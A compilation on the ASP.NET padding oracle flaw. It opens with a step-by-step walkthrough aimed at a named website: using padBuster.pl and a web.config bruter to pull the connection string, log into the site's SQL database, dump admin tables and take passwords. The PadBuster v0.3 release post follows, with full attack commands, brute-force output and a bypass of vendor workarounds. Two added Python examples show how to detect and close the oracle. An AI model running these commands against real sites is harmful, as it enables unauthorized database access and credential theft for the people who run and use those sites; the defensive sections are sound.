/ScriptResource.axd?d=

- Scenario I: the extracted PaddingOracle.rar has a folder that contains all the scripts (exe.bat,
padBuster.pl, web.config_Bruter.pl). Now,
- Open exe.bat and run padBuster.pl
- Command: ..\perl.exe padBuster.pl http://madeinvietnam.net/WebResource.axd?d=2uT3s0_S0xTW7_RW6mW1q2 2uT3s0_S0xTW7_RW6mW1q2 16 -encoding 3 -plaintext "|||~/web.config"

- Choose ID 2

- Now you have the encrypted value: T-2QM86TZAAAAAAAAAAAAAAAAAAAAAA1
- Now construct a command like:
..\perl.exe Web.Config_Bruter.pl http://madeinvietnam.net/ScriptResource.axd -2QM86TZAAAAAAAAAAAAAAAAAAAAAA1

- Copy this command to exe.bat and run it.

- You will get the resulting exploit block: gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0

- Create a link: http://madeinvietnam.net/ScriptResource.axd?d=gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0

- Open it in your web browser.
- You will find one XML document now.
- Find the keyword: connection
- In that line you will get the source address, user ID and password.

- Now open MS SQL and connect to the database.

- Now the whole database is dumped to your PC, or you can say I am connected to their database;
now find the admin tables and columns and open them.
- You can simply right-click on the admin table and select top 1000 rows.

- OK, you have got your admin and its password now.
- If the password is not encrypted then fine, but as in our case, if the password is encrypted then you
have to intercept the password through Burp Suite, OR if you can decrypt your password
that's awesome...
- Open Burp Suite > Proxy > Intercept on

PADBUSTER V0.3 AND THE .NET PADDING ORACLE ATTACK

Now that a weekend has passed since the .NET patch was released, and since there
is already a working public example of how to reliably download a web.config
using the padding oracle attack, we have decided to finally release v0.3 of
PadBuster with the "Brute Force" option. This option is specifically designed to
handle scenarios where the first block of ciphertext cannot be crafted using CBC-R
due to a secret IV. This feature was NOT designed specifically for the .NET attack,
as our intention for PadBuster is to be a universal tool for identifying and
exploiting padding oracles in any web application. That being said, the brute force
option CAN be used to reliably perform a web.config download attack within a
reasonable number of requests.
Before discussing how to perform this attack using PadBuster, and some of the
other new features in this version, it's worth noting that there are more efficient
ways to perform the web.config download attack using ScriptResource.axd. The T-Block
brute force attack vector, which was originally pointed out to me by James
Martin of ESP Technologies and is also discussed here by Giorgio Fedon of
Minded Security, is significantly faster and more efficient. This technique,
however, is pretty specific to the .NET ScriptResource.axd attack and as such is
not likely to be incorporated into PadBuster (a separate exploit script is probably
warranted).
The web.config attack using PadBuster is essentially a three step process. I will
assume that the reader is already familiar with the specifics of why the script
resource handler is vulnerable to a file download attack. If you are not familiar
with the underlying issue, you can read about it here, here and here.
Step 1: Encrypt the Payload using CBC-R
The first step of the attack is to identify a component that is vulnerable to the
padding oracle attack and use it to encrypt the web.config payload
(|||~/web.config). This can typically be done in a few ways:
1 - Using WebResource.axd as a padding oracle for CBC-R.

If CustomErrors are NOT enabled, then you don't even need a valid ciphertext
sample to exploit the oracle...you can use an encoded dummy value of all NULLS
instead (AAAAAAAAAAAAAAAAAAAAAA2).
padBuster.pl http://www.myapp.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2 AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config"
If CustomErrors ARE enabled, you can still use WebResource.axd as the oracle.
The caveat, however, is that you'll need to use a valid ciphertext query string
sample and use the -prefix option so that PadBuster sends this sample as the prefix
of each test request.
padBuster.pl http://www.myapp.com/WebResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config" -prefix 1s45vAJre3GVd98iQoAjgQ2
2 - Using ScriptResource.axd as a padding oracle for CBC-R.
Like with the web resource handler, this is pretty straightforward if CustomErrors
are not enabled:
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config"
If CustomErrors ARE enabled, this handler can also be used as a padding oracle.
The interesting thing about this technique is that it seems to work despite
implementing all of the workarounds that Microsoft recommended before the patch
was issued (CustomErrors using RedirectMode and optional Sleep). This
technique, however, requires use of the brute force option so I'll come back to that
in a bit.
Step 2: Verify the encrypted payload does NOT include pipes
This step is optional, but certainly worth performing to ensure that you aren't
headed down a dead end road. In order for the exploit to work, the payload you
send to the handler (including the "garbage" IV block) CANNOT include any pipe
characters. If it does, the payload will never work. To verify this, you can use the
padding oracle to decrypt your payload and verify its contents. So assuming that
Step 1 produced a payload value of

"iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1", then the
following command would be used to verify the contents of the payload. Make
sure to use the -noiv option as the first block is the one you are most interested in.
padBuster.pl http://www.myapp.com/WebResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -noiv
So what if your payload DOES include pipes? Not to fear, there's an easy
workaround for this too. You may have noticed that when you decrypt samples
using PadBuster, it prints the HEX encoded Ciphertext Bytes and Intermediate
Bytes with the results of each block. You can optionally use any of these pairs
along with the -ciphertext and -intermediate switches to feed PadBuster a known
pair of ciphertext/intermediate values for use during CBC-R encryption. Using any
one of these pairs to encrypt your exploit payload should produce a different
payload than would otherwise be generated by PadBuster on its own, which can
then be verified to ensure that it does not contain pipes.
Step 3: Brute force the first block
Now that you have a valid payload, the final step is to obtain the first block that
will trigger the file download logic. The reason this step is tricky is that the
Framework typically does not pass an IV along with the ciphertext. As such, we
can't use the padding oracle to reliably produce our desired first block.
The good news is that since you only need the first two bytes of the decrypted
value to trigger our exploit (either Q#,q#,R# or r#) you can essentially brute force
the needed block with fairly reliable success. And the even better news is that
you’d be surprised at how quick it is to blindly brute force one of these values.
The approach taken by PadBuster is similar, but slightly different, than the
approach used by Web.config Bruter script released by Giorgio Fedon. I must
again credit James Martin for originally sharing his proof of concept exploit code
with me that leveraged this technique for identifying the first block. Instead of
random block values, however, PadBuster performs a sequential brute force
starting with all NULLS. The sequential brute force ensures that you never attempt
the same block value more than once and also allows you to resume the brute force
where you left off if the script gets killed (using the -resume option). The example
shown below assumes the payload from our Step 2 example above:

padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce -log
PadBuster's brute force mode works similar to the other modes of PadBuster,
where the first step is an automated response analysis. The main difference is that
rather than identifying a padding error, you want to identify an error that indicates
failure of the brute force attempt rather than success. In most cases, you may have
only one response to choose from...which is totally fine (unless one of the initial
256 fuzzing attempts produces a different response). In the case of
ScriptResource.axd, there’s a good chance you'll have more than one as shown
below.
INFO: Starting PadBuster Brute Force Mode
[+] Starting response analysis...

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 337 N/A
2 ** 255 404 1524 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended :
The reason for the 200 response included above is the T-Block. For our purposes,
we are not using the T-Block so we can select signature #2 (the 404). PadBuster
will continue issuing brute force attempts and notify you of every response that
does not match this signature. You'll likely get several T-Block hits similar to the
200 response shown above before you hit a block that returns the web.config as
shown below (this is just an excerpt from the output)
Attempt 4275 - Status: 200 - Content Length: 367
http://www.myapp.com/ScriptResource.axd?d=igA4AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0

Attempt 4561 - Status: 200 - Content Length: 360
http://www.myapp.com/ScriptResource.axd?d=4AA4AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0

Attempt 4792 - Status: 200 - Content Length: 100277
http://www.myapp.com/ScriptResource.axd?d=xwA5AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0

Attempt 5353 - Status: 200 - Content Length: 359
http://www.myapp.com/ScriptResource.axd?d=BAA6AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0
As you can imagine, it’s difficult to tell whether these responses contain anything
meaningful based solely on the data that is printed to the screen. In the case of this
exploit, we know that the web.config file is likely going to be much larger than the
small T-Block responses which average around 500 Bytes. You can actually see
that in the excerpt above, attempt number 4792 shows a much larger content
length...this is the response that contains the web.config file. The inclusion of
unwanted T-Block responses in our output is a result of our desire to maintain
PadBuster as a universal tool that is not specific to a particular vulnerability such
as this one.
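The response-signature table and the attempt excerpt above are the data a tester reads, and the same grouping is what an application owner should run against their own handler after a fix: if every tampered ciphertext lands in one signature, nothing observable separates a padding failure from any other rejection. The Python below is an added example, not PadBuster code. It parses lines in PadBuster's "Attempt N - Status: S - Content Length: L" format (the embedded log excerpt is constructed for the example, and the Location column is omitted because the attempt lines do not carry it), groups them into (status, length) signatures, takes the most frequent one as the baseline the way the ** marker does, and lists the attempts that fall outside it. Function names are mine.

```python
import re
from collections import Counter

# Constructed log excerpt in PadBuster's attempt-line format (values are made up).
SAMPLE_LOG = """\
Attempt 12 - Status: 404 - Content Length: 1524
Attempt 13 - Status: 404 - Content Length: 1524
Attempt 14 - Status: 404 - Content Length: 1524
Attempt 60 - Status: 200 - Content Length: 337
Attempt 61 - Status: 404 - Content Length: 1524
Attempt 62 - Status: 404 - Content Length: 1524
Attempt 4792 - Status: 200 - Content Length: 100277
"""

ATTEMPT_RE = re.compile(r"^Attempt (\d+) - Status: (\d{3}) - Content Length: (\d+)$")


def parse_attempts(log_text: str) -> list:
    """Return [(attempt_no, status, length), ...]; lines that do not match are ignored."""
    rows = []
    for line in log_text.splitlines():
        match = ATTEMPT_RE.match(line.strip())
        if match:
            rows.append(tuple(int(group) for group in match.groups()))
    return rows


def signature_table(rows: list) -> list:
    """Group attempts by (status, length) and rank by frequency, most common first.

    PadBuster's response analysis builds the same table and marks the most
    frequent signature with '**' as the recommended baseline ("error") pattern.
    """
    counts = Counter((status, length) for _, status, length in rows)
    return counts.most_common()


def baseline_signature(rows: list) -> tuple:
    return signature_table(rows)[0][0]


def anomalies(rows: list) -> list:
    """Attempts whose signature differs from the baseline.

    A non-empty result means the endpoint still behaves observably differently
    for some tampered inputs, i.e. a behavioural oracle remains.
    """
    base = baseline_signature(rows)
    return [row for row in rows if (row[1], row[2]) != base]


def render_table(rows: list) -> str:
    """Render the signature table in the layout PadBuster prints."""
    lines = ["ID#   Freq  Status  Length"]
    for idx, ((status, length), freq) in enumerate(signature_table(rows), start=1):
        marker = "**" if idx == 1 else "  "
        lines.append(f"{idx:<3}{marker} {freq:>5}  {status:>6}  {length:>6}")
    return "\n".join(lines)


if __name__ == "__main__":
    attempts = parse_attempts(SAMPLE_LOG)
    print(render_table(attempts))
    for attempt_no, status, length in anomalies(attempts):
        print(f"outside baseline: attempt {attempt_no} ({status}, {length} bytes)")
```

Run against a log from your own handler, the baseline should be the only signature; each row that anomalies() returns is a distinguishable response that a tamper-then-observe attack can key on, whatever the status code or error page configured.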
You may also have noticed that our original command made use of another new
option (-log). The "log" option tells PadBuster to log various output files in an
automatically generated folder using the PadBuster.DDMMYY-TIME naming
convention. This option is critical for use in brute force mode, since each matching
response is logged to this folder and can be easily reviewed to determine whether
the brute force attempt worked. For the case of a web.config download exploit, I
recommend running the above command and monitoring the output folder to
determine when a significantly larger response file gets created.
Bypassing the Workarounds
Now that you've seen how to retrieve the web.config, let’s go back to an alternate
technique for using ScriptResource.axd as a padding oracle. As I mentioned
previously, this technique works despite implementing the recommended
workarounds initially presented by Microsoft in their guidance preceding the patch
release. To start, you'll need a valid ciphertext sample. The sample, however, does

not have to be valid for the script resource handler (it can be taken from any
Framework component...most easily from the WebResource.axd query string).
Step 1: Find a valid T-Block Request
Using the obtained sample, along with the -bruteforce option, the following
command can be used to quickly brute force a valid T-Block. The following
example assumes that we were able to obtain a valid "d" value from a link to the
web resource handler
(/WebResource.axd?d=qmZbysenet6VGS94Ord8gQ2&t=633768217780468750).
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysenet6VGS94Ord8gQ2 16 -encoding 3 -bruteforce
Once you run PadBuster with these options, and select the default error pattern,
you should get a 200 response within the first few hundred requests similar to the
one shown below:
Attempt 60 - Status: 200 - Content Length: 337
http://www.myapp.com/ScriptResource.axd?d=OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1
Step 2: Use the obtained T-Block with the -prefix option
Now you can leverage the obtained T-Block request, along with the -prefix option,
to use the script resource handler as a padding oracle as shown below.
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysenet6VGS94Ord8gQ2 16 -encoding 3 -noiv -prefix OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1
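The section above shows why error-page and sleep workarounds do not close the oracle: the handler still decrypts attacker-supplied ciphertext and its behaviour (200 versus 404, response size) still depends on what the padding check found. The fix that removes the oracle is to authenticate the ciphertext before any decryption and to collapse every failure into one response. The Python below is an added example of that contrast, not code from PadBuster, from the .NET handlers, or from Microsoft's patch. It uses a small Feistel construction keyed with HMAC-SHA256 as a stand-in block cipher so it runs on the standard library alone (the oracle is a property of CBC plus a padding check, not of the cipher), carries the IV inside the token for simplicity even though the .NET handler described above keeps it secret, and derives separate encryption and MAC keys from one master key; all names, key material and the "res:" resource prefix are my assumptions. The last function only submits two tampered copies of a valid token and counts the distinct replies; it measures whether the endpoint tells padding failures apart, nothing more.

```python
import hashlib
import hmac

BLOCK = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _subkey(master: bytes, label: bytes) -> bytes:
    # Separate keys for encryption and authentication (assumption: a hash of label||master suffices here)
    return hashlib.sha256(label + master).digest()


# Toy 16-byte block cipher: a 4-round Feistel network with an HMAC-SHA256 round function.
def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the condition a padding oracle exposes
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([n]) * n
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(out)


def make_tokens(master: bytes, name: bytes, iv: bytes) -> tuple:
    """Return (unauthenticated token, authenticated token): iv || ct [|| HMAC-SHA256 tag]."""
    body = iv + cbc_encrypt(_subkey(master, b"enc"), iv, name)
    tag = hmac.new(_subkey(master, b"mac"), body, hashlib.sha256).digest()
    return body, body + tag


def legacy_handler(master: bytes, token: bytes) -> tuple:
    """Decrypts straight away, so a padding failure and an unknown resource get different replies."""
    try:
        name = cbc_decrypt(_subkey(master, b"enc"), token[:BLOCK], token[BLOCK:])
    except ValueError:
        return 500, "padding error"
    if not name.startswith(b"res:"):
        return 404, "not found"
    return 200, name[4:].decode("latin-1")


def hardened_handler(master: bytes, token: bytes) -> tuple:
    """Encrypt-then-MAC: verify the tag in constant time before decrypting, and
    map every failure to the same reply, so padding is never checked on tampered data."""
    body, tag = token[:-32], token[-32:]
    expected = hmac.new(_subkey(master, b"mac"), body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return 404, "not found"
    try:
        name = cbc_decrypt(_subkey(master, b"enc"), body[:BLOCK], body[BLOCK:])
    except ValueError:
        return 404, "not found"
    if not name.startswith(b"res:"):
        return 404, "not found"
    return 200, name[4:].decode("latin-1")


def distinct_failure_responses(handler, master: bytes, token: bytes) -> set:
    """Submit two tampered copies of a valid single-block token: one IV bit-flip that
    corrupts the padding byte, one that corrupts the first plaintext byte. More than
    one distinct reply means the endpoint is telling the two failures apart."""
    bad_pad = bytearray(token)
    bad_pad[BLOCK - 1] ^= 0x10  # padding byte 0x04 becomes 0x14, which is invalid
    bad_name = bytearray(token)
    bad_name[0] ^= 0x01  # first plaintext byte changes, padding stays valid
    return {handler(master, bytes(bad_pad)), handler(master, bytes(bad_name))}


if __name__ == "__main__":
    master, iv = b"demo-master-key", bytes(range(16))  # constructed demo values
    plain, authed = make_tokens(master, b"res:site.cfg", iv)
    print(distinct_failure_responses(legacy_handler, master, plain))     # two replies
    print(distinct_failure_responses(hardened_handler, master, authed))  # one reply
```

The legacy handler answers the two tampered tokens with 500 and 404, which is exactly the status/length difference the response analysis above keys on; the hardened handler answers both with the same 404 because the tag check fails before the ciphertext is touched. Adding a sleep or a friendlier error page to the legacy handler changes the numbers in the table, not the fact that there are two rows in it.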
The examples above hopefully demonstrate how to use the new features of
PadBuster for performing various exploits against the .NET framework. Our plan
is to add more features to PadBuster where they make sense, specifically features
that can be useful against a wide variety of padding oracle attack vectors. As
always, send us your feedback, modifications, bug reports, or general comments so
that we can incorporate them into future versions.